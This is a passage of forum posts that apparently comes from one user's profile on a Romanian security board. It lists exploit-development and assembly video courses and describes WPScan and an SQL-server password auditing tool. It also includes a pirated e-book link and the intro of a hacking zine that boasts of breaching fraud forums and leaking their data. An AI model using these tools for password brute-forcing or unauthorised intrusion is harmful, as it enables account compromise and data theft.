    Assembly Language Megaprimer for Linux Description In this video series, we will learn the basics of Assembly Language programming on Linux. This will help us in doing reverse engineering and writing exploits in later videos. I will be start from the absolute scratch, so no pre-requisites required. - Assembly Primer For Hackers (Part 1) System Organization - Assembly Primer For Hackers (Part 2) Virtual Memory Organization - Assembly Primer For Hackers (Part 3) Gdb Usage Primer - Assembly Primer For Hackers (Part 4) Hello World - Assembly Primer For Hackers (Part 5) Data Types - Assembly Primer For Hackers (Part 6) Moving Data - Assembly Primer For Hackers (Part 7) Working With Strings - Assembly Primer For Hackers (Part 8) Unconditional Branching - Assembly Primer For Hackers (Part 9) Conditional Branching - Assembly Primer For Hackers (Part 10) Functions - Assembly Primer For Hackers (Part 11) Functions Stack Videos: http://www.securitytube.net/groups?operation=view&groupId=5
  19. Nytro
    Windows Assembly Language Megaprimer Description In this video series, we will learn how to write assembly code for Windows. We will be using the knowledge we gained in the Assembly Language Megaprimer for Linux. - Windows Assembly Language Primer Part 1 (Processor Modes) - Windows Assembly Language Primer For Hackers Part 2 (Protected Mode Assembly) - Windows Assembly Language Primer For Hackers Part 3 (Win32 Asm Using Masm32) - Windows Assembly Language Primer For Hackers Part 4 (Masm Data Types) - Windows Assembly Language Primer For Hackers Part 5 (Procedures) - Windows Assembly Language Primer For Hackers Part 6 (Macros) - Windows Assembly Language Primer For Hackers Part 7 (Program Control Using Jmp) - Windows Assembly Language Primer For Hackers Part 8 (Decision Directives) - Windows Assembly Language Primer For Hackers Part 9 (Loops) Videos: http://www.securitytube.net/groups?operation=view&groupId=6
  20. Nytro
    Exploit Research Megaprimer Description In this video series, we will learn how to program exploits for various vulnerabilities published online. We will also look at how to use various tools and techniques to find Zero Day vulnerabilities in both open and closed source software. - Exploit Research Megaprimer Part 1 Topic Introduction By Vivek - Exploit Research Megaprimer Part 2 Memcpy Buffer Overflow - Exploit Research Megaprimer Part 3 Strcpy Buffer Overflow - Exploit Research Megaprimer Part 4 Minishare Buffer Overflow - Exploit Research Megaprimer Part 5 Freesshd Buffer Overflow - Exploit Research Megaprimer Part 6 Seh Basics - Exploit Research Megaprimer Part 7 Overwrite Seh - Exploit Research Megaprimer Part 8 Exploiting Seh - Exploit Research Megaprimer Part 9 Guest Lecture By Andrew King - Binary Diffing Microsoft Patches Videos: http://www.securitytube.net/groups?operation=view&groupId=7
  21. Nytro
    Inchidem topicul, locul acesta se vrea sa fie pentru cei pasionati de securitatea IT, discutati altundeva despre pariuri. Edit: daca ai facut soft pentru asa ceva, e alta treaba.
  22. Nytro
    Secure Your Wordpress | Tool Explained Wpscan Description: Wordpress is one of the most popular CMS among its entire open source competitor. WordPress has very simple and open framework. It is the most desirable choice of any hacker to start learning hacking with it. Today we will look at tool called wpscan. This tool is vulnerability scanner for any WordPress installation. It will let you know following things 1. Version of the WordPress 2. Known list of information disclosure files (ex. Readme.html) 3. WordPress usernames 4. WordPress Plugin names 5. Bruteforce for password (Password list needs to be generated) Video: http://www.securitytube.net/video/2367
  23. Nytro
    Vezi cum arata link-ul, are nevoie de mici modificari... Ex: Download Security_and_Hacking_Anti_Hacker_Tool_Kit_Second_Edition.chm for free on Filesonic.com
  24. Nytro
    xSQLScanner 1.2 and Mono Version From: Rodrigo Matuck <rodrigomatuck () globo com> Date: Sun, 23 Oct 2011 21:47:25 -0200 Hi everyone I published at my blog a new tool called xSQLScanner. This program allow the user audit MS-SQL and My-SQL servers. Some features: 1 - 6 Vulnerability Audit options; 1.2 - Test for weak password fast; 1.3 - Test for wear/user passwords; 1.4 - Wordlist option; 1.5 5 - Userlist option; 2 - Portscanner 7 - Range IP Address audit and more. Now the good news, i made 2 versions. Windows & Linux. The linux version use the Mono Project, so i compiled mono version to run under Linux (BackTrack 5 - GNOME). Here the instructions to install under linux: 1 - get xsqlscan-mono.tgz - 4shared.com - online file sharing and storage - download 2 - tar -xzvf xsqlscan.tar.gz 3 - cd xsqlscan 4 - ./xsqlscanw 5 - The program will verify if you have Mono Core files. If already have, the application will launcher. 5.1 - Answer 'yes' to download the libs and mono core files 6 - Restart the application typing: ./xsqlscanw 7 - Enjoy. The link for Windows version: xsqlscanner-1.2.zip - 4shared.com - online file sharing and storage - download Remember: any bugs, suggestions please contact me. Regards Sursa: Penetration Testing: xSQLScanner 1.2 and Mono Version
  25. Nytro
    Owned and exposed - Nr. 3 |\___/| -=[ISSUE - NO 3]=- =) ^Y^ (= -=[OF]=- \ ^ / )=*=( ______________________________ __ ____________ _ / \ |.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | || _ | | | | | -__| _ | | . | | . || /| | | |\ ||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ | | | ______ |__//_// ___/ __ | | | .-----.--.--.-----.| |.-----.--\_).--| || | | | | -__|_ _| _ || || ||__ --| -__| _ || | | | |_____|__.__| __|| || ||_____|_____|_____|| |_/ \__________________________|__|___| || |___________________| |______| Featuring... .---. /\ Brought to you by .---. / . \ / \ your Happy Ninjas / . \ |\_/| | | | |\_/| | | | /| | b | | | /| .-----------------------' | | a | .---------------------------' | / .-. | | c | / .-. | | / \ Intro | | k | | / \ The Happy Ninja Faker | | |\_. | St0re.cc | | | | |\_. | Swissfaking.net | |\| | /| El-Basar.biz | | | |\| | /| Vpn24.org | | `---' | | | o | | `---' | | | |------------------' | n | | |----------------------' \ | .---. | c | \ | .---. \ / / . \ | e | \ / / . \ `---' |\_/| | | | `---' |\_/| | | | /| | | | | /| .-----------------------' | | a | .---------------------------' | / .-. | | g | / .-. | | / \ Undercover.su | | a | | / \ Secure-Host.in | | |\_. | k!LLu's Botnet | | i | | |\_. | Unique-Crew.net | |\| | /| | | n | |\| | /| | | `---' | | | | | `---' | | | |------------------' | | | |----------------------' \ | .---. | h | \ | .---. \ / / . \ | e | \ / / . \ `---' |\_/| | | r | `---' |\_/| | | | /| | e | | | /| .-----------------------' | | | .---------------------------' | / .-. | | | / .-. | | / \ Zion-Network.net | | t | | / \ Some leftovers | | |\_. | Hackbase.cc | | o | | |\_. | Outro | |\| | /| | | | |\| | /| | | `---' | | | | | `---' | | | |------------------' | r | | |----------------------' \ | | m | \ | \ / | | \ / `---' | /\ | `---' :\______|/ \|______/: \__0day______0day__/ | /\ | || || || || || || || || | \/ | \____/ (____) First of all, here is the verification of the sha1 hash we published when hba-crew got owned: 49bd4433fff1b04530dcaff1f52fa971ff895871 = sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03) ,;~;, /\_ ( / (() //) | \\ ,,;;'\ __ _( )m=((((((((((((((========={ Intro }=========------- /' ' '()/~' '.(, | ,;( )|| | ~ Tonight's the night. And it's going to happen, ,;' \ /-(.;, ) again and again. It has to happen. ) / ) / // || We all want to welcome you to a brand new issue )_\ )_\ of Owned and exp0sed! Before we get to the fun part, we'd just like to clarify some things since there has been a lot going on on the internet since our last issue. Movements, as they put it, like Anonymous or the short-lived phenomenon of Lulzsec have gotten an increasingly important topic to media and the public. We want to line out our motivation in contrast to theirs. Anonymous has tried to gain as much media attention as possible by inflicting the most damage possible on big companies and service providers. Similarily, Lulzsec have attacked various websites and published an enormous amount of information. However, while it's their goal to put up pressure on governments and big organizations, it's ours to protect the public from the abysses of the internet. Fraud is our main concern and we intent to contain it as much as possible. While Anon and Lulzsec toss out their stuff within weeks, we take our time to gain access, collect data and aggregate it nicely for you, our readers. This is why there is a substantial time span between our releases. We of course also monitor the German and international fraud scene as it recovers from our attacks; it's hard to stop something that is driven by selfishness, greed and money. We also find it worrying that Anonymous and especially Lulzsec act in what they call "Operation Antisec". The original Antisec Movement was brought to life by actual hackers and targeted full disclosure and the corporate security industry. Publishing gigantic amounts of (corporate) data on the internet does exactly the opposite: It provides the security industry with the attention they need and hence new customers. But let's now look at why we are here today. "Money is the root of all evil" as the proverb has it; and it's why fraud communities do come back after we have owned and exposed them; but as long as they carry on, we do, too. Fraudsters ought to know that they're not safe because we are going to hunt down every single site that is left. We experience the fraud scene scattering wider and wider after every issue we have published; new boards, and with them new admins, emerge out of nowhere. That just shows well again how stubborn fraudsters are as most of them still refuse to accept that they lost their right to exist on the internet. It's particularly frustrating that they don't seem to draw lessons from getting owned again and again. That being said we can just strongly advise you to spend your time on something worthwhile. It's not too late ... Download: http://blog.yakuza112.org/wp-content/uploads/2011/10/exp03.txt
×
×
  • Create New...